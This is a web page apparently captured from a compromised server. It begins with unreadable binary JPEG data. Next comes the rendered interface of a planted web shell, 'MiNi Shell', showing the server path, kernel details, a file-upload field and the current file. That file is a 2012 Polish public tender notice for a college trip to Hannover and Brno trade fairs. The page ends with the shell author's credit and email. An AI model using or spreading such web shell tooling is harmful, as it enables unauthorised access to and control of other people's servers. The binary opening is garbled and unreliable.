JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/61733-N-2012.html

<p class="kh_header"><b>Kalisz: Zorganizowanie wyjazdu dla studentów na Międzynarodowe Targi  Technologii, Innowacji i Automatyki  w Przemyśle -HANNOVER  MESSE 2012-  w ramach projektu  Mechanika i budowa maszyn szansą na  zawód  z przyszłością,             oraz  Międzynarodowe Targi Technologii Sanitarnej, Ogrzewania, Klimatyzacji 
 i  Automatyzacji Budownictwa  - SKH BRNO 2012-  w ramach projektu Inżynieria 
 Środowiska  szansą na zawód  z przyszłością
            dla W</b><br>
<b>Numer ogłoszenia: 61733 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu , ul. Nowy Świat 4, 62-800 Kalisz, woj. wielkopolskie, tel. 62 767 95 00, 767 95 32, faks 62 767 95 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie wyjazdu dla studentów na Międzynarodowe Targi  Technologii, Innowacji i Automatyki  w Przemyśle -HANNOVER  MESSE 2012-  w ramach projektu  Mechanika i budowa maszyn szansą na  zawód  z przyszłością,             oraz  Międzynarodowe Targi Technologii Sanitarnej, Ogrzewania, Klimatyzacji 
 i  Automatyzacji Budownictwa  - SKH BRNO 2012-  w ramach projektu Inżynieria 
 Środowiska  szansą na zawód  z przyszłością
            dla W.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  zorganizowanie wyjazdu dla studentów na :
Międzynarodowe Targi  Technologii, Innowacji i Automatyki  w Przemyśle -
HANNOVER  MESSE 2012-  w ramach projektu Mechanika i budowa maszyn             szansą na  zawód  z przyszłością, w dniach 25 - 27 kwietnia 2012 r.,
oraz Międzynarodowe Targi Technologii Sanitarnej, Ogrzewania, Klimatyzacji 
i  Automatyzacji Budownictwa  - SKH BRNO 2012-  w ramach projektu Inżynieria 
Środowiska  szansą na zawód  z przyszłością, w dniach 24 -25 kwietnia 2012 r.,
dla Wydziału Politechnicznego Państwowej Wyższej Szkoły Zawodowej 
im. Prezydenta  Stanisława Wojciechowskiego  w Kaliszu. 
2. Zamówienie składa się z  2 części (zadań), z podziałem na:
 Zadanie nr 1 - Międzynarodowe Targi  Technologii,   Innowacji  i Automatyki  
                     w Przemyśle  - HANNOVER  MESSE  2012 
 Zadanie nr 2- Międzynarodowe Targi Technologii Sanitarnej, Ogrzewania, 
                    Klimatyzacji  i  Automatyzacji Budownictwa - SKH BRNO 2012
3. Zakres przedmiotu zamówienia obejmuje :
1) zakup biletów wstępu na przedmiotowe targi dla wszystkich uczestników, dla Zadania nr 2 -  75 uczestników ( 73 studentów + 2 opiekunów) w dniu 24 kwietnia  2012 r. Przedmiot zamówienia nie obejmuje biletów wstępu dla 52 uczestników  HANNOVER  MESSE 2012 ,  zadanie nr 1. 
 2) przejazd  na trasie; 
 Zadanie nr 1 ; Kalisz - Hannover i Hannover -Kalisz , jeden luksusowy autokar 
  wyposażony w : wc, barek, video, klimatyzacja,
 Zadanie nr 2 ; Kalisz - Brno i  Brno -Kalisz , jeden piętrowy lub dwa  autokary
                  wyposażone w : wc, barek, video, klimatyzacja,
3) noclegi w hotelu w odległości nie większej niż do 50 km od targów, w pokojach  nie więcej niż 4 osobowych ( dwu, trzy lub cztero / osobowych), z węzłem sanitarnym  ( wc, prysznic, umywalka), w tym: 
dla Zadania nr 1  - dwa noclegi ; z 25 na 26 i z 26 na 27 kwietnia 2012 r.,  
 dla Zadania nr 2 -  jeden nocleg z 24 na 25 kwietnia 2012 r.,  
4)  wyżywienie , w tym ;
  śniadania kontynentalne , w hotelu ; dla   zadania nr 1 ; w dniu 26, 27 kwietnia 2012 r.,  dla zadania nr 2 ; w dniu 25 kwietnia , po śniadaniu   zwiedzanie miasta, po południu wyjazd do Kalisza
 obiadokolacje, w tym jedna na trasie (droga powrotna) do Kalisza   ; 
 - dla zadania 1 - 3 ( trzy),
 - dla zadania 2 - 2 (dwie).                                               	
 5) usługi pilotów na trasie i przewodników po Brnie i Hannoverze - dla każdego zadania, 
6) ubezpieczenie wszystkich uczestników  wyjazdu - w tym ; NNW i KL,
 7) zorganizowanie  wycieczki po Brnie i Hannoverze 
4. Zamawiający  zastrzega  możliwość  zmniejszenia liczby uczestników, z przyczyn 
 losowych ( np. choroba, itp.). Ilość ta nie może przekroczyć 3 osób dla każdego zadania.  Zmiany te Wykonawca  uwzględni w fakturze. Wykonawca będzie realizował zamówienie po cenie jednostkowej  dla jednej osoby zawartej w ofercie.   5. Wykonawca zobowiązany jest do przedłożenia w ofercie, szczegółowego programu  wyjazdu na targi  dla każdego zadania, z rozpisaniem na poszczególne  dni , uwzględniając - przejazdy, zwiedzanie, noclegi ( w jakich pokojach) , wyżywienie, itd. 
 6. Wszystkie koszty dodatkowe, związane z wyjazdem ( opłaty, np. za autostrady,  parkingi, podatki,  itp.) pokryje Wykonawca.
   7. Zamawiający wymaga oddzielnego rozliczenia (faktury) dla każdego projektu (zadania1 i 2)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 60.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania aktualnej  licencji na organizację usług turystycznych w krajach europejskich. Okres ważności   licencji nie może skończyć się przed dniem zakończenia  wyjazdu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aktualną gwarancję bankową lub ubezpieczeniową na  minimalną wysokość -
 równowartość  4500 euro, zgodnie z § 5 ust.1 pkt.3 Rozporządzenia  Ministra 
 Finansów z dnia 16  grudnia 2010 r., w sprawie minimalnej wysokości sumy 
 gwarancji bankowej lub ubezpieczeniowej wymaganej w związku z działalnością 
 wykonywana przez  organizatorów turystyki i pośredników turystycznych (Dz.U. Nr
          238 poz. 1584 ze zm.)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli	Wykonawca, zgodnie z art. 26 ust. 2 b   polegać będzie  na wiedzy  i doświadczeniu,     potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach  finansowych  innych  podmiotów, niezależnie  od charakteru  prawnego łączących go z nim    stosunków,  zobowiązany jest  udowodnić Zamawiającemu,  iż  będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności  przedstawiając w tym celu pisemne  zobowiązanie  tych podmiotów do  oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2. Formularz oferty  - wzór stanowi załącznik do SIWZ;
3. Formularz cenowy- wzór stanowi załącznik nr 3 ;
4. Wskazanie w  ofercie tej części zamówienia, której wykonanie zmierza powierzyć
                 podwykonawcom,  jeżeli wystąpią - patrz pkt.25 SIWZ; 
5. W przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
       o którym  mowa w ppkt. 10.2. lit.b lub ppkt.10.10 SIWZ;
6. W przypadku Wykonawców będących osobą fizyczną, w celu umożliwienia 
     Zamawiającemu identyfikacji danych Wykonawcy, zaleca się załączenie do oferty  aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Podstawą dokonania zmiany zapisów umowy, poza przypadkami określonymi w umowie, będą:
1) zmiany przepisów prawa  powszechnie obowiązującego, jeśli zmiana ta wpływa na zakres lub  warunki wykonania przez  strony świadczeń wynikających z umowy ,
 2) zmiana terminu realizacji zamówienia, wynikająca z czynników obiektywnych lub
  których strony nie były w stanie przewidzieć pomimo zachowania należytej staranności,
 3) zmiana w sposobie realizacji zamówienia polegająca na zmianie ilości uczestników, o której   mowa w § 1 ust.5 niniejszej umowy i związana z tym zmiana wynagrodzenia lub inne zmiany    z przyczyn organizacyjnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwsz.kalisz.pl / biuletyn<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu, Dział Techniczny - ul. Nowy Świat 5, I piętro, pokój 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 15:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Prezydenta Stanisława Wojciechowskiego w Kaliszu, Dział Techniczny - ul. Nowy Świat 5, I piętro, pokój 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekty współfinansowane przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Program Operacyjny Kapitał Ludzki, Priorytet IV, Działanie 4.1 Poddziałanie 4.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Międzynarodowe Targi  Technologii,   Innowacji  i Automatyki  w Przemyśle  - HANNOVER  MESSE  2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia nie obejmuje biletów wstępu dla 52 uczestników  HANNOVER  MESSE 2012 ,   
2) przejazd  na trasie; 
  Zadanie nr 1 ; Kalisz - Hannover i Hannover -Kalisz , jeden luksusowy autokar 
                                       wyposażony w : wc, barek, video, klimatyzacja,
    	3)  noclegi w hotelu w odległości nie większej niż do 50 km od targów, w pokojach  nie    więcej niż 4 osobowych ( dwu, trzy lub cztero / osobowych), z węzłem sanitarnym      ( wc, prysznic, umywalka), w tym: dwa noclegi ; z 25 na 26 i z 26 na 27 kwietnia 2012 r.,  
  4)  wyżywienie , w tym ;   śniadania kontynentalne , w hotelu ; wdniu 26, 27 kwietnia 2012 r.,  obiadokolacje 3, w tym jedna na trasie (droga powrotna) do Kalisza   ; 
 5) usługi pilotów na trasie i przewodników po Brnie i Hannoverze - dla każdego zadania, 
6) ubezpieczenie wszystkich uczestników  wyjazdu - w tym ; NNW i KL,
 7) zorganizowanie  wycieczki po  Hannoverze.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 60.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Międzynarodowe Targi Technologii Sanitarnej, Ogrzewania,  Klimatyzacji  i  Automatyzacji Budownictwa - SKH BRNO 2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. zakup biletów wstępu na przedmiotowe targi dla wszystkich uczestników, dla 75 uczestników ( 73 studentów + 2 opiekunów) w dniu 24 kwietnia  2012 r.
 2) przejazd  na trasie; Kalisz - Brno i  Brno -Kalisz , jeden piętrowy lub dwa  autokary   wyposażone w : wc, barek, video, klimatyzacja,
3) noclegi w hotelu w odległości nie większej niż do 50 km od targów, w pokojach  nie   więcej niż 4 osobowych ( dwu, trzy lub cztero / osobowych), z węzłem sanitarnym    ( wc, prysznic, umywalka), w tym: 
  jeden nocleg z 24 na 25 kwietnia 2012 r.,  
4)  wyżywienie , w tym ;  śniadania kontynentalne , w hotelu ; w dniu 25 kwietnia , po śniadaniu   zwiedzanie miasta, po południu wyjazd do Kalisza
  obiadokolacje - 2, w tym jedna na trasie (droga powrotna) do Kalisza   ; 
  5) usługi pilotów na trasie i przewodników po Brnie , 
6) ubezpieczenie wszystkich uczestników  wyjazdu - w tym ; NNW i KL,
7) zorganizowanie  wycieczki po Brnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.50.00.00-4, 60.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com